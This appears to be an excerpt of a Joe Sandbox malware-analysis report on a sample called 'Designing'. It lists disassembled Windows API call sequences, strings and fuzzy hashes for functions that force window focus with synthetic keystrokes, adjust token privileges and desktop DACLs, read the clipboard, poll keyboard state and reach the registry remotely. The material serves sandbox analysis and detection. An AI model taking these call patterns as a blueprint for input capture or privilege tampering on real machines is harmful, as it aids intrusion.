                                              • Opcode Fuzzy Hash: f5ce2e361e75ae10f02854c16d0b711645c1cc9ea029c543ac5e0a04ab030b5d
                                              • Instruction Fuzzy Hash: E8428C30209241EFD724DF28C884FBABBE5FF48310F140699F695972A1EBB5AC54CB52
                                              APIs
                                              • GetForegroundWindow.USER32(00000000,?), ref: 00B45EE2
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B810D7
                                              • IsIconic.USER32(?), ref: 00B810E0
                                              • ShowWindow.USER32(?,00000009), ref: 00B810ED
                                              • SetForegroundWindow.USER32(?), ref: 00B810F7
                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B8110D
                                              • GetCurrentThreadId.KERNEL32 ref: 00B81114
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B81120
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B81131
                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B81139
                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B81141
                                              • SetForegroundWindow.USER32(?), ref: 00B81144
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B81159
                                              • keybd_event.USER32(00000012,00000000), ref: 00B81164
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8116E
                                              • keybd_event.USER32(00000012,00000000), ref: 00B81173
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8117C
                                              • keybd_event.USER32(00000012,00000000), ref: 00B81181
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8118B
                                              • keybd_event.USER32(00000012,00000000), ref: 00B81190
                                              • SetForegroundWindow.USER32(?), ref: 00B81193
                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00B811BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 4125248594-2988720461
                                              • Opcode ID: cd02fe3bfec7b31152ff3f490882106bbf16ceb3017d488e008495d68510b9ea
                                              • Instruction ID: 32469aecb1ef6448f5ebe377e86b44d6c113ed84457426f9d43c98536a39b3df
                                              • Opcode Fuzzy Hash: cd02fe3bfec7b31152ff3f490882106bbf16ceb3017d488e008495d68510b9ea
                                              • Instruction Fuzzy Hash: 44314171A51318BBEB207B659C89F7F7EACEB48B50F104065FA04BB1D1CAB05D51EBA0
                                              APIs
                                                • Part of subcall function 00B89399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B893E3
                                                • Part of subcall function 00B89399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B89410
                                                • Part of subcall function 00B89399: GetLastError.KERNEL32 ref: 00B8941D
                                              • _memset.LIBCMT ref: 00B88F71
                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B88FC3
                                              • CloseHandle.KERNEL32(?), ref: 00B88FD4
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B88FEB
                                              • GetProcessWindowStation.USER32 ref: 00B89004
                                              • SetProcessWindowStation.USER32(00000000), ref: 00B8900E
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B89028
                                                • Part of subcall function 00B88DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B88F27), ref: 00B88DFE
                                                • Part of subcall function 00B88DE9: CloseHandle.KERNEL32(?,?,00B88F27), ref: 00B88E10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                              • String ID: $default$winsta0
                                              • API String ID: 2063423040-1027155976
                                              • Opcode ID: a91e3f15b92a735fe9a7f50fa999c7fb26c09bcfc5103c7ab9df1225f6df24ed
                                              • Instruction ID: 10047b7e6eec8d02ee3a7cdb8511d4c93c9e0222781f9ba5aadb38cf634ec234
                                              • Opcode Fuzzy Hash: a91e3f15b92a735fe9a7f50fa999c7fb26c09bcfc5103c7ab9df1225f6df24ed
                                              • Instruction Fuzzy Hash: 07812671914249BFDF11BFA4DC49ABE7BB9EF08304F0841A9F911B6261DB318E15DB60
                                              APIs
                                              • OpenClipboard.USER32(00BC0980), ref: 00BA465C
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00BA466A
                                              • GetClipboardData.USER32(0000000D), ref: 00BA4672
                                              • CloseClipboard.USER32 ref: 00BA467E
                                              • GlobalLock.KERNEL32(00000000), ref: 00BA469A
                                              • CloseClipboard.USER32 ref: 00BA46A4
                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00BA46B9
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00BA46C6
                                              • GetClipboardData.USER32(00000001), ref: 00BA46CE
                                              • GlobalLock.KERNEL32(00000000), ref: 00BA46DB
                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00BA470F
                                              • CloseClipboard.USER32 ref: 00BA481F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                              • String ID:
                                              • API String ID: 3222323430-0
                                              • Opcode ID: e0352462df09e72e7438083d9429a405a57007ea2fe998dcc3c689d3406dff80
                                              • Instruction ID: 64a530f231219d3fd11ddc435c6f1be67f6e33da9bb380fe123490793273e0b0
                                              • Opcode Fuzzy Hash: e0352462df09e72e7438083d9429a405a57007ea2fe998dcc3c689d3406dff80
                                              • Instruction Fuzzy Hash: AD518D31248201ABD300FF68EC89F6E77E8EBDAB11F1045A9F556D71A1DFB0D9058B62
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00B9CDD0
                                              • FindClose.KERNEL32(00000000), ref: 00B9CE24
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9CE49
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9CE60
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9CE87
                                              • __swprintf.LIBCMT ref: 00B9CED3
                                              • __swprintf.LIBCMT ref: 00B9CF16
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • __swprintf.LIBCMT ref: 00B9CF6A
                                                • Part of subcall function 00B538C8: __woutput_l.LIBCMT ref: 00B53921
                                              • __swprintf.LIBCMT ref: 00B9CFB8
                                                • Part of subcall function 00B538C8: __flsbuf.LIBCMT ref: 00B53943
                                                • Part of subcall function 00B538C8: __flsbuf.LIBCMT ref: 00B5395B
                                              • __swprintf.LIBCMT ref: 00B9D007
                                              • __swprintf.LIBCMT ref: 00B9D056
                                              • __swprintf.LIBCMT ref: 00B9D0A5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                              • API String ID: 3953360268-2428617273
                                              • Opcode ID: 7e40cbeb3fc5f9f055c041becd6fb5f307c9244bbbb6a88f3dcc0f07fcd7f522
                                              • Instruction ID: 1f9831d288b1adc1f56f9f35472730b6d130a862013487db8e62196b922ae192
                                              • Opcode Fuzzy Hash: 7e40cbeb3fc5f9f055c041becd6fb5f307c9244bbbb6a88f3dcc0f07fcd7f522
                                              • Instruction Fuzzy Hash: 37A12CB1404304ABC714EFA4D986EAFB7ECEF94704F400969F59587191EB30EE48CB62
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B9F5F9
                                              • _wcscmp.LIBCMT ref: 00B9F60E
                                              • _wcscmp.LIBCMT ref: 00B9F625
                                              • GetFileAttributesW.KERNEL32(?), ref: 00B9F637
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00B9F651
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B9F669
                                              • FindClose.KERNEL32(00000000), ref: 00B9F674
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00B9F690
                                              • _wcscmp.LIBCMT ref: 00B9F6B7
                                              • _wcscmp.LIBCMT ref: 00B9F6CE
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9F6E0
                                              • SetCurrentDirectoryW.KERNEL32(00BEB578), ref: 00B9F6FE
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9F708
                                              • FindClose.KERNEL32(00000000), ref: 00B9F715
                                              • FindClose.KERNEL32(00000000), ref: 00B9F727
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1803514871-438819550
                                              • Opcode ID: eb75590ce207f173ac8744497a6aa0835f95c436557db85d492def0bf49813a5
                                              • Instruction ID: 2b70620ac4dc92fa240755bd311864bc3d64995318d4729420c3642fea4cceb9
                                              • Opcode Fuzzy Hash: eb75590ce207f173ac8744497a6aa0835f95c436557db85d492def0bf49813a5
                                              • Instruction Fuzzy Hash: EE316D71A4121AAADF10AFA5AC49EEE77ECEF09321F1441F5E804E31A0DF74DE44CA60
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB0FB3
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BC0980,00000000,?,00000000,?,?), ref: 00BB1021
                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BB1069
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BB10F2
                                              • RegCloseKey.ADVAPI32(?), ref: 00BB1412
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BB141F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Close$ConnectCreateRegistryValue
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 536824911-966354055
                                              • Opcode ID: 5dbdb8f3e194b7917eb303552cfe717e84bbe6a31eaa46953d9dd9cdcfb4b357
                                              • Instruction ID: e44c2244cbd6fd3d6f452c57cb5f38cbee40e574414a6531e52e1249cd69c26e
                                              • Opcode Fuzzy Hash: 5dbdb8f3e194b7917eb303552cfe717e84bbe6a31eaa46953d9dd9cdcfb4b357
                                              • Instruction Fuzzy Hash: E0025A716006019FCB14EF29C895E6AB7E5FF89710F1489ACF85A9B362CB70ED41CB91
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B9F756
                                              • _wcscmp.LIBCMT ref: 00B9F76B
                                              • _wcscmp.LIBCMT ref: 00B9F782
                                                • Part of subcall function 00B94875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B94890
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00B9F7B1
                                              • FindClose.KERNEL32(00000000), ref: 00B9F7BC
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00B9F7D8
                                              • _wcscmp.LIBCMT ref: 00B9F7FF
                                              • _wcscmp.LIBCMT ref: 00B9F816
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9F828
                                              • SetCurrentDirectoryW.KERNEL32(00BEB578), ref: 00B9F846
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B9F850
                                              • FindClose.KERNEL32(00000000), ref: 00B9F85D
                                              • FindClose.KERNEL32(00000000), ref: 00B9F86F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 1824444939-438819550
                                              • Opcode ID: bb866a56ddfe2487a48b312b23aac0fef4cc43395b9a5a8bf59ca7edcf2e49ae
                                              • Instruction ID: 1baef6e389f958c6c7efdae362bcd434d40ee0f4ba0f7943b0835bc6090130a0
                                              • Opcode Fuzzy Hash: bb866a56ddfe2487a48b312b23aac0fef4cc43395b9a5a8bf59ca7edcf2e49ae
                                              • Instruction Fuzzy Hash: 7031807290021AAADF10ABB59C88EEA77ECDF09371F1001F5E814E71A0DB70DE458A60
                                              APIs
                                                • Part of subcall function 00B88E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B88E3C
                                                • Part of subcall function 00B88E20: GetLastError.KERNEL32(?,00B88900,?,?,?), ref: 00B88E46
                                                • Part of subcall function 00B88E20: GetProcessHeap.KERNEL32(00000008,?,?,00B88900,?,?,?), ref: 00B88E55
                                                • Part of subcall function 00B88E20: HeapAlloc.KERNEL32(00000000,?,00B88900,?,?,?), ref: 00B88E5C
                                                • Part of subcall function 00B88E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B88E73
                                                • Part of subcall function 00B88EBD: GetProcessHeap.KERNEL32(00000008,00B88916,00000000,00000000,?,00B88916,?), ref: 00B88EC9
                                                • Part of subcall function 00B88EBD: HeapAlloc.KERNEL32(00000000,?,00B88916,?), ref: 00B88ED0
                                                • Part of subcall function 00B88EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B88916,?), ref: 00B88EE1
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B88931
                                              • _memset.LIBCMT ref: 00B88946
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B88965
                                              • GetLengthSid.ADVAPI32(?), ref: 00B88976
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00B889B3
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B889CF
                                              • GetLengthSid.ADVAPI32(?), ref: 00B889EC
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B889FB
                                              • HeapAlloc.KERNEL32(00000000), ref: 00B88A02
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B88A23
                                              • CopySid.ADVAPI32(00000000), ref: 00B88A2A
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B88A5B
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B88A81
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B88A95
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: b5dd507fbc4c1f7c7dfbb2ca5b3ae1470e4eb679d36b0036104e916b2f7d73de
                                              • Instruction ID: fbe521563176a3e32e28296db39569e11a97dc8f526670662572ba1c14f8ddb2
                                              • Opcode Fuzzy Hash: b5dd507fbc4c1f7c7dfbb2ca5b3ae1470e4eb679d36b0036104e916b2f7d73de
                                              • Instruction Fuzzy Hash: 3F611A75910209FFDF04EF95DC45EAEBBB9FF08304F44816AE915A72A0DB359A05CB60
                                              APIs
                                                • Part of subcall function 00BB147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB0B0C
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BB0BAB
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BB0C43
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BB0E82
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BB0E8F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              • Opcode ID: 8fb0d7f95505435a7f870168932bbf4bc6031bf9c47006178aa026036edd2192
                                              • Instruction ID: 2b9b8bbd9ead498c22da57ea99266f877381edd8f0b171a8ee6689201c6ad5be
                                              • Opcode Fuzzy Hash: 8fb0d7f95505435a7f870168932bbf4bc6031bf9c47006178aa026036edd2192
                                              • Instruction Fuzzy Hash: 34E13931614214AFCB14EF28C895E7BBBE8EF89714F0489ADF849DB261DB70E901CB51
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00B90530
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00B905B1
                                              • GetKeyState.USER32(000000A0), ref: 00B905CC
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00B905E6
                                              • GetKeyState.USER32(000000A1), ref: 00B905FB
                                              • GetAsyncKeyState.USER32(00000011), ref: 00B90613
                                              • GetKeyState.USER32(00000011), ref: 00B90625
                                              • GetAsyncKeyState.USER32(00000012), ref: 00B9063D
                                              • GetKeyState.USER32(00000012), ref: 00B9064F
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00B90667
                                              • GetKeyState.USER32(0000005B), ref: 00B90679
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 665a05967109b2105b88e00e51ef9e80cacff8669b9e916b95ebc5cb08b82ced
                                              • Instruction ID: edc8e42f3932cfebf7e489f9579fb09da8a3cd27a412e5a3a2641367ee4560ba
                                              • Opcode Fuzzy Hash: 665a05967109b2105b88e00e51ef9e80cacff8669b9e916b95ebc5cb08b82ced
                                              • Instruction Fuzzy Hash: 4E41DB305247CA6EFF31B76488447B5BEE0EB65304F0840EAD9C5875C2EBA499D4CFA2
                                              APIs
                                              • __swprintf.LIBCMT ref: 00B94451
                                              • __swprintf.LIBCMT ref: 00B9445E
                                                • Part of subcall function 00B538C8: __woutput_l.LIBCMT ref: 00B53921
                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B94488
                                              • LoadResource.KERNEL32(?,00000000), ref: 00B94494
                                              • LockResource.KERNEL32(00000000), ref: 00B944A1
                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 00B944C1
                                              • LoadResource.KERNEL32(?,00000000), ref: 00B944D3
                                              • SizeofResource.KERNEL32(?,00000000), ref: 00B944E2
                                              • LockResource.KERNEL32(?), ref: 00B944EE
                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B9454F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                              • String ID:
                                              • API String ID: 1433390588-0
                                              • Opcode ID: 135ae715dd4f4cc7060b23d55f8c97f21e0677ad2317a404b2d620ec517ecdaa
                                              • Instruction ID: 220d78275eab35c54decc484979f7fb7ee8bff29de4e1cb60318367c21a1fc74
                                              • Opcode Fuzzy Hash: 135ae715dd4f4cc7060b23d55f8c97f21e0677ad2317a404b2d620ec517ecdaa
                                              • Instruction Fuzzy Hash: 11314D7150121AABDF11AFA0AD98EBB7BECEB18341F0444A5F91597250EB74DA22CB60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: a3f7fb6a6787b59536d0cd8ae5ac791116996f350da7d53c907d87a6a2d33f64
                                              • Instruction ID: cb717dc82776b87d5416ff0258cf85ec8dc5deecb3bef905b068e29ddc506da5
                                              • Opcode Fuzzy Hash: a3f7fb6a6787b59536d0cd8ae5ac791116996f350da7d53c907d87a6a2d33f64
                                              • Instruction Fuzzy Hash: B0218B31255210DFEB01AF24EC49F2E77E8EF89721F1080A9F9469B2A1CF74AD10CB94
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B9FA83
                                              • FindClose.KERNEL32(00000000), ref: 00B9FB96
                                                • Part of subcall function 00B352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B352E6
                                              • Sleep.KERNEL32(0000000A), ref: 00B9FAB3
                                              • _wcscmp.LIBCMT ref: 00B9FAC7
                                              • _wcscmp.LIBCMT ref: 00B9FAE2
                                              • FindNextFileW.KERNEL32(?,?), ref: 00B9FB80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
